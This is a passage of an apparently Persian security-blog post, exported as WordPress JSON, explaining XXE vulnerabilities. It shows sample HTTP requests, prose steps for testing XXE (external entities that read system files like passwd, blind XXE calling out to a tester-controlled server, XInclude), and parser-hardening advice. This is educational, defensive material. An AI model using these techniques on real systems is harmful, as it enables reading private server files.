elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"3ee0931\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-b81ba27\" data-id=\"b81ba27\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-bbb0f27 elementor-widget elementor-widget-text-editor\" data-id=\"bbb0f27\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><strong><span style=\"color: #ffffff;\">POST \/action HTTP\/1.0 <\/span><\/strong><br \/><strong><span style=\"color: #ffffff;\">Content-Type: application\/x-www-form-urlencoded <\/span><\/strong><br \/><strong><span style=\"color: #ffffff;\">Content-Length: 7<\/span><\/strong><\/p><p dir=\"ltr\" style=\"text-align: left;\"><strong><span style=\"color: #ffffff;\">foo=bar<\/span><\/strong><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-d167254 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"d167254\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-ffe797f\" data-id=\"ffe797f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-9ad1ad6 elementor-widget elementor-widget-text-editor\" data-id=\"9ad1ad6\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>\u062f\u0631 \u0627\u06cc\u0646 \u0635\u0648\u0631\u062a \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0628\u062a\u0648\u0627\u0646\u06cc\u062f \u0631\u06cc\u06a9\u0648\u0626\u0633\u062a \u0632\u06cc\u0631 \u0631\u0627 \u0646\u06cc\u0632 \u062b\u0628\u062a \u06a9\u0646\u06cc\u062f \u0648 \u0646\u062a\u06cc\u062c\u0647\u200c\u06cc \u06cc\u06a9\u0633\u0627\u0646\u06cc \u0628\u06af\u06cc\u0631\u06cc\u062f:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-bac7764 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"bac7764\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-9997f84\" data-id=\"9997f84\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-f4f387a elementor-widget elementor-widget-text-editor\" data-id=\"f4f387a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><strong><span style=\"color: #ffffff;\">POST \/action HTTP\/1.0 <\/span><\/strong><br \/><strong><span style=\"color: #ffffff;\">Content-Type: text\/xml <\/span><\/strong><br \/><strong><span style=\"color: #ffffff;\">Content-Length: 52<\/span><\/strong><\/p><p dir=\"ltr\" style=\"text-align: left;\"><strong><span style=\"color: #ffffff;\">&lt;?xml version=&#8221;1.0&#8243; encoding=&#8221;UTF-8&#8243;?&gt;&lt;foo&gt;bar&lt;\/foo&gt;<\/span><\/strong><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-6dd1531 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"6dd1531\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-e53af18\" data-id=\"e53af18\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-5270f3b elementor-widget elementor-widget-text-editor\" data-id=\"5270f3b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\u0627\u06af\u0631 \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0631\u06cc\u06a9\u0648\u0626\u0633\u062a\u200c\u0647\u0627\u06cc \u062d\u0627\u0648\u06cc XML \u062f\u0631 \u0628\u062f\u0646\u0647\u200c\u06cc \u067e\u06cc\u0627\u0645 \u0631\u0627 \u0642\u0628\u0648\u0644 \u06a9\u0646\u062f\u060c \u0648 \u0645\u062d\u062a\u0648\u0627\u06cc \u0628\u062f\u0646\u0647\u200c\u06cc \u067e\u06cc\u0627\u0645 \u0631\u0627 \u0628\u0647 \u0639\u0646\u0648\u0627\u0646 XML \u062a\u062c\u0632\u06cc\u0647 \u06a9\u0646\u062f\u060c \u062f\u0631 \u0627\u06cc\u0646 \u0635\u0648\u0631\u062a \u0628\u0647 \u0633\u0627\u062f\u06af\u06cc \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u0633\u0637\u062d \u062d\u0645\u0644\u0647\u200c\u06cc \u0645\u062e\u0641\u06cc XXE \u0631\u0627 \u0628\u06cc\u0627\u0628\u06cc\u062f\u061b \u06a9\u0627\u0641\u06cc\u200c\u0633\u062a \u0642\u0627\u0644\u0628 \u0631\u06cc\u06a9\u0648\u0626\u0633\u062a\u200c\u0647\u0627 \u0631\u0627 \u0637\u0648\u0631\u06cc \u062a\u063a\u06cc\u06cc\u0631 \u062f\u0647\u06cc\u062f \u06a9\u0647 \u0627\u0632 \u0642\u0627\u0644\u0628 XML \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u0646\u062f.\n<h3 id=\"find-xxes\"><span style=\"font-size: 12pt;\">\u0686\u06af\u0648\u0646\u0647 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc XXE \u0631\u0627 \u0628\u06cc\u0627\u0628\u06cc\u0645\u061f (\u062a\u0633\u062a \u0648\u062c\u0648\u062f XXE)<\/span><\/h3>\n\u062a\u0639\u062f\u0627\u062f \u06a9\u062b\u06cc\u0631\u06cc \u0627\u0632 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc XXE \u0631\u0627 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0628\u0647 \u0633\u0631\u0639\u062a \u0648 \u0628\u0627 \u0636\u0631\u06cc\u0628 \u0627\u0637\u0645\u06cc\u0646\u0627\u0646 \u0628\u0627\u0644\u0627\u060c \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0633\u06a9\u0646\u0631 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0648\u0628 Burp Suite \u0628\u06cc\u0627\u0628\u06cc\u062f.\n\u0628\u0631\u0627\u06cc \u062a\u0633\u062a \u062f\u0633\u062a\u06cc \u0648\u062c\u0648\u062f \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc XXE \u0645\u0639\u0645\u0648\u0644\u0627 \u0628\u0627\u06cc\u062f \u0645\u0631\u0627\u062d\u0644 \u0632\u06cc\u0631 \u0631\u0627 \u0627\u0646\u062c\u0627\u0645 \u062f\u0647\u06cc\u062f:\n<ul>\n \t<li>\u062a\u0633\u062a \u0627\u0645\u06a9\u0627\u0646 \u062f\u0633\u062a\u06cc\u0627\u0628\u06cc \u0628\u0647 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627: \u0628\u0631\u0627\u06cc \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0628\u0627\u06cc\u062f \u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u062e\u0627\u0631\u062c\u06cc \u062a\u0639\u0631\u06cc\u0641 \u06a9\u0646\u06cc\u062f \u0648 \u0645\u0642\u062f\u0627\u0631 \u0622\u0646 \u0631\u0627 \u06cc\u06a9\u06cc \u0627\u0632 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc \u06a9\u0627\u0645\u0644\u0627 \u0634\u0646\u0627\u062e\u062a\u0647\u200c\u0634\u062f\u0647\u200c\u06cc \u0633\u06cc\u0633\u062a\u0645\u200c\u0639\u0627\u0645\u0644 (\u0645\u062b\u0644 passwd) \u0642\u0631\u0627\u0631 \u062f\u0647\u06cc\u062f\u060c \u0648 \u0633\u067e\u0633 \u0627\u0632 \u0622\u0646 \u0627\u0646\u062a\u06cc\u062a\u06cc \u062f\u0631 \u062f\u0627\u062f\u0647\u200c\u0647\u0627\u06cc\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u062f \u06a9\u0647 \u062f\u0631 \u067e\u0627\u0633\u062e \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0627\u0631\u0633\u0627\u0644 \u0645\u06cc\u200c\u0634\u0648\u0646\u062f.<\/li>\n \t<li>\u062a\u0633\u062a \u0648\u062c\u0648\u062f \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc Blind XXE: \u0628\u0631\u0627\u06cc \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u0627\u06a9\u0633\u062a\u0631\u0646\u0627\u0644 \u062a\u0639\u0631\u06cc\u0641 \u06a9\u0646\u06cc\u062f \u0648 \u0645\u0642\u062f\u0627\u0631 \u0622\u0646 \u0631\u0627 \u0628\u0631\u0627\u0628\u0631 URL \u0633\u06cc\u0633\u062a\u0645\u06cc \u0642\u0631\u0627\u0631 \u062f\u0647\u06cc\u062f \u06a9\u0647 \u062f\u0631 \u06a9\u0646\u062a\u0631\u0644 \u0634\u0645\u0627\u0633\u062a\u060c \u0648 \u0627\u0631\u062a\u0628\u0627\u0637\u0627\u062a \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0628\u0627 \u0622\u0646 \u0633\u06cc\u0633\u062a\u0645 \u0631\u0627 \u0645\u0627\u0646\u06cc\u062a\u0648\u0631 \u06a9\u0646\u06cc\u062f.<\/li>\n \t<li>\u062a\u0633\u062a \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u062f\u0627\u062f\u0647 \u063a\u06cc\u0631 XML \u062f\u0631 \u0627\u0633\u0646\u0627\u062f XML: \u0647\u0645\u0627\u0646\u200c\u0637\u0648\u0631 \u06a9\u0647 \u062a\u0648\u0636\u06cc\u062d \u062f\u0627\u062f\u06cc\u0645\u060c \u062f\u0627\u062f\u0647\u200c\u0647\u0627\u06cc \u062b\u0628\u062a\u200c\u0634\u062f\u0647 \u062a\u0648\u0633\u0637 \u06a9\u0627\u0631\u0628\u0631 \u062d\u062a\u06cc \u0627\u06af\u0631 \u062f\u0631 \u0642\u0627\u0644\u0628 XML \u0646\u0628\u0627\u0634\u0646\u062f\u060c \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u062f\u0631 \u0633\u0645\u062a \u0633\u0631\u0648\u0631 \u062f\u0631 \u06cc\u06a9 \u0633\u0646\u062f XML \u0642\u0631\u0627\u0631 \u062f\u0627\u062f\u0647 \u0634\u0648\u0646\u062f. \u0628\u0631\u0627\u06cc \u062a\u0633\u062a \u0648\u062c\u0648\u062f \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u0627\u06cc\u062f \u0627\u0632 \u062a\u06a9\u0646\u06cc\u06a9 \u062d\u0645\u0644\u0647 XInclude \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u062f \u0648 \u0633\u0639\u06cc \u06a9\u0646\u06cc\u062f \u06cc\u06a9\u06cc \u0627\u0632 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc \u0634\u0646\u0627\u062e\u062a\u0647\u200c\u0634\u062f\u0647\u200c\u06cc \u0633\u06cc\u0633\u062a\u0645 (\u0645\u0627\u0646\u0646\u062f passwd) \u0631\u0627 \u0628\u0647 \u062f\u0633\u062a \u0622\u0648\u0631\u06cc\u062f.<\/li>\n<\/ul>\n<h3 id=\"prevent-xxes\"><span style=\"font-size: 12pt;\">\u0686\u06af\u0648\u0646\u0647 \u0627\u0632 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u06a9\u0646\u06cc\u0645\u061f<\/span><\/h3>\n\u062a\u0645\u0627\u0645\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc XXE \u0628\u0647 \u0627\u06cc\u0646 \u062e\u0627\u0637\u0631 \u0628\u0647 \u0648\u062c\u0648\u062f \u0645\u06cc\u200c\u0622\u06cc\u0646\u062f \u06a9\u0647 \u06a9\u062a\u0627\u0628\u062e\u0627\u0646\u0647\u200c\u06cc \u062a\u062c\u0632\u06cc\u0647\u200c\u06cc XML \u06a9\u0647 \u062a\u0648\u0633\u0637 \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f\u060c \u0627\u0632 \u0627\u0645\u06a9\u0627\u0646\u0627\u062a\u06cc \u062f\u0631 XML \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f \u06a9\u0647 \u0639\u0644\u0627\u0648\u0647 \u0628\u0631 \u0627\u06cc\u0646 \u06a9\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0628\u0633\u06cc\u0627\u0631 \u062e\u0637\u0631\u0646\u0627\u06a9 \u0628\u0627\u0634\u0646\u062f\u060c \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0628\u0647 \u0622\u0646\u200c\u0647\u0627 \u0646\u06cc\u0627\u0632\u06cc \u0646\u062f\u0627\u0631\u062f \u0648 \u0642\u0631\u0627\u0631 \u0646\u06cc\u0633\u062a \u0627\u0632 \u0622\u0646\u200c\u0647\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u062f. \u0622\u0633\u0627\u0646\u200c\u062a\u0631\u06cc\u0646 \u0648 \u0645\u0648\u062b\u0631\u062a\u0631\u06cc\u0646 \u0631\u0627\u0647 \u0628\u0631\u0627\u06cc \u067e\u06cc\u0634\u06af\u06cc\u0631\u06cc \u0627\u0632 \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642 XXE\u060c \u063a\u06cc\u0631\u0641\u0639\u0627\u0644\u200c\u06a9\u0631\u062f\u0646 \u0627\u06cc\u0646 \u0627\u0645\u06a9\u0627\u0646\u0627\u062a \u062f\u0631 Parser \u0627\u0633\u062a.\n\u0639\u0645\u0648\u0645\u0627 \u063a\u06cc\u0631\u0641\u0639\u0627\u0644\u200c\u06a9\u0631\u062f\u0646 \u062a\u062c\u0632\u06cc\u0647\u200c\u06cc \u0627\u0646\u062a\u06cc\u062a\u06cc\u200c\u0647\u0627\u06cc \u062e\u0627\u0631\u062c\u06cc \u0648 \u063a\u06cc\u0631\u0641\u0639\u0627\u0644\u200c\u06a9\u0631\u062f\u0646 \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u06cc \u0627\u0632 XInclude \u06a9\u0627\u0641\u06cc \u0627\u0633\u062a. \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0631\u0627 \u0645\u0639\u0645\u0648\u0644\u0627 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0628\u0627 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u0648 \u06cc\u0627 \u062a\u063a\u06cc\u06cc\u0631 \u06a9\u062f \u067e\u0627\u0631\u0633\u0631 \u0648 \u0628\u0627\u0632\u0646\u0648\u06cc\u0633\u06cc \u0631\u0641\u062a\u0627\u0631\u0647\u0627\u06cc \u067e\u06cc\u0634\u200c\u0641\u0631\u0636 \u0627\u0646\u062c\u0627\u0645 \u062f\u0627\u062f. \u0628\u0631\u0627\u06cc \u06cc\u0627\u0641\u062a\u0646 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0628\u06cc\u0634\u062a\u0631 \u062f\u0631\u0628\u0627\u0631\u0647\u200c\u06cc \u0646\u062d\u0648\u0647\u200c\u06cc \u063a\u06cc\u0631\u0641\u0639\u0627\u0644\u200c\u06a9\u0631\u062f\u0646 \u0627\u0645\u06a9\u0627\u0646\u0627\u062a \u063a\u06cc\u0631\u0636\u0631\u0648\u0631\u06cc\u060c \u0628\u0647 \u062f\u0627\u06a9\u06cc\u0648\u0645\u0646\u062a\u06cc\u0634\u0646 \u06a9\u062a\u0627\u0628\u062e\u0627\u0646\u0647 \u06cc\u0627 API \u067e\u0627\u0631\u0633\u0631 XML \u0645\u0631\u0627\u062c\u0639\u0647 \u06a9\u0646\u06cc\u062f.\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-d30ee18 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"d30ee18\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-f4c5eb4\" data-id=\"f4c5eb4\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-51b166e elementor-widget elementor-widget-accordion\" data-id=\"51b166e\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"accordion.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-accordion\">\n\t\t\t\t\t\t\t<div class=\"elementor-accordion-item\">\n\t\t\t\t\t<div id=\"elementor-tab-title-8561\" class=\"elementor-tab-title\" data-tab=\"1\" role=\"button\" aria-controls=\"elementor-tab-content-8561\" aria-expanded=\"false\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon elementor-accordion-icon-right\" aria-hidden=\"true\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon-closed\"><i class=\"fas fa-plus\"><\/i><\/span>\n\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon-opened\"><i class=\"fas fa-minus\"><\/i><\/span>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span>\n\t\t\t\t\t\t\t\t\t\t\t\t<a class=\"elementor-accordion-title\" tabindex=\"0\">\u0628\u06cc\u0634\u062a\u0631 \u0628\u062e\u0648\u0627\u0646\u06cc\u062f<\/a>\n\t\t\t\t\t<\/div>\n\t\t\t\t\t<div id=\"elementor-tab-content-8561\" class=\"elementor-tab-content elementor-clearfix\" data-tab=\"1\" role=\"region\" aria-labelledby=\"elementor-tab-title-8561\"><ul>\n<li><strong><a href=\"https:\/\/liangroup.net\/blog\/installing-and-operating-vulnerability-scanners\/\">\u0622\u0645\u0648\u0632\u0634 \u0646\u0635\u0628 \u0648 \u0631\u0627\u0647\u200c\u0627\u0646\u062f\u0627\u0632\u06cc \u0627\u0646\u0648\u0627\u0639 \u0627\u0633\u06a9\u0646\u0631 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc<\/a><\/strong><\/li>\n<\/ul><\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>\u062f\u0631 \u0627\u06cc\u0646 \u0645\u0642\u0627\u0644\u0647 \u0645\u06cc\u200c\u062e\u0648\u0627\u0647\u06cc\u0645 \u0628\u0627 \u0645\u062b\u0627\u0644 \u0639\u0645\u0644\u06cc \u0648 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06a9\u062f\u060c \u0628\u0627 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u0622\u0634\u0646\u0627 \u0634\u0648\u06cc\u0645. XXE \u06cc\u0627 XML External Entities\u060c \u062f\u0631 \u0644\u06cc\u0633\u062a OWASP Top 10 \u0628\u0631\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc \u0648\u0628\u060c \u062f\u0631 \u0631\u062a\u0628\u0647 \u0686\u0647\u0627\u0631\u0645 \u0642\u0631\u0627\u0631 \u062f\u0627\u0631\u062f \u0648 \u0628\u062e\u0634 \u0645\u0647\u0645\u06cc \u0627\u0632 \u062d\u0645\u0644\u0627\u062a \u0648\u0628\u060c \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642 XXE \u0647\u0633\u062a\u0646\u062f. \u0627\u0645\u0627 \u0628\u0631\u0627\u06cc \u0627\u06cc\u0646 \u06a9\u0647 \u0628\u0647\u062a\u0631 \u0628\u062a\u0648\u0627\u0646\u06cc\u0645 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0631\u0627 \u062f\u0631\u06a9 \u06a9\u0646\u06cc\u0645\u060c &hellip;<\/p>\n","protected":false},"author":1,"featured_media":11093,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2,275,349],"tags":[],"class_list":["post-11057","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-pentest","category-penetration-test-article","category-slides"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v26.5 (Yoast SEO v27.6) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>XML \u0686\u06cc\u0633\u062a \u0648 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u0686\u06af\u0648\u0646\u0647 \u0628\u0647 \u0648\u062c\u0648\u062f \u0645\u06cc\u200c\u0622\u06cc\u062f\u061f - \u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646<\/title>\n<meta name=\"description\" content=\"XXE \u06cc\u0627 XML External Entities\u060c \u062f\u0631 \u0644\u06cc\u0633\u062a 10 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u0631\u062a\u0631 \u0628\u0631\u0627\u06cc \u0648\u0628\u060c \u062f\u0631 \u0631\u062a\u0628\u0647 \u0686\u0647\u0627\u0631\u0645 \u0642\u0631\u0627\u0631 \u062f\u0627\u0631\u062f \u0648 \u0628\u062e\u0634 \u0645\u0647\u0645\u06cc \u0627\u0632 \u062d\u0645\u0644\u0627\u062a \u0648\u0628\u060c \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642 XXE \u0647\u0633\u062a\u0646\u062f.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/liangroup.net\/blog\/what-is-xxe\/\" \/>\n<meta property=\"og:locale\" content=\"fa_IR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"XML \u0686\u06cc\u0633\u062a \u0648 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u0686\u06af\u0648\u0646\u0647 \u0628\u0647 \u0648\u062c\u0648\u062f \u0645\u06cc\u200c\u0622\u06cc\u062f\u061f\" \/>\n<meta property=\"og:description\" content=\"XXE \u06cc\u0627 XML External Entities\u060c \u062f\u0631 \u0644\u06cc\u0633\u062a 10 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u0631\u062a\u0631 \u0628\u0631\u0627\u06cc \u0648\u0628\u060c \u062f\u0631 \u0631\u062a\u0628\u0647 \u0686\u0647\u0627\u0631\u0645 \u0642\u0631\u0627\u0631 \u062f\u0627\u0631\u062f \u0648 \u0628\u062e\u0634 \u0645\u0647\u0645\u06cc \u0627\u0632 \u062d\u0645\u0644\u0627\u062a \u0648\u0628\u060c \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642 XXE \u0647\u0633\u062a\u0646\u062f.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/liangroup.net\/blog\/what-is-xxe\/\" \/>\n<meta property=\"og:site_name\" content=\"\u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646\" \/>\n<meta property=\"article:author\" content=\"#\" \/>\n<meta property=\"article:published_time\" content=\"2021-05-19T13:31:26+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-02-05T12:01:43+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/xxe-cover.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"800\" \/>\n\t<meta property=\"og:image:height\" content=\"500\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"\u0627\u062f\u0645\u06cc\u0646\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@#\" \/>\n<meta name=\"twitter:site\" content=\"@liansecurity\" \/>\n<meta name=\"twitter:label1\" content=\"\u0646\u0648\u0634\u062a\u0647\u200c\u0634\u062f\u0647 \u0628\u062f\u0633\u062a\" \/>\n\t<meta name=\"twitter:data1\" content=\"\u0627\u062f\u0645\u06cc\u0646\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u0632\u0645\u0627\u0646 \u062a\u0642\u0631\u06cc\u0628\u06cc \u0628\u0631\u0627\u06cc \u062e\u0648\u0627\u0646\u062f\u0646\" \/>\n\t<meta name=\"twitter:data2\" content=\"29 \u062f\u0642\u06cc\u0642\u0647\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/what-is-xxe\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/what-is-xxe\\\/\"},\"author\":{\"name\":\"\u0627\u062f\u0645\u06cc\u0646\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/#\\\/schema\\\/person\\\/56ec88338ff7cb5202779a216d9f3399\"},\"headline\":\"XML \u0686\u06cc\u0633\u062a \u0648 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u0686\u06af\u0648\u0646\u0647 \u0628\u0647 \u0648\u062c\u0648\u062f \u0645\u06cc\u200c\u0622\u06cc\u062f\u061f\",\"datePublished\":\"2021-05-19T13:31:26+00:00\",\"dateModified\":\"2022-02-05T12:01:43+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/what-is-xxe\\\/\"},\"wordCount\":959,\"commentCount\":0,\"image\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/what-is-xxe\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/xxe-cover.jpg\",\"articleSection\":[\"\u062a\u0633\u062a \u0646\u0641\u0648\u0630 \u0648 \u0627\u0645\u0646\u06cc\u062a\",\"\u0645\u0642\u0627\u0644\u0627\u062a \u062a\u0633\u062a \u0646\u0641\u0648\u0630\",\"\u06cc\u06cc\u06cc\u06cc 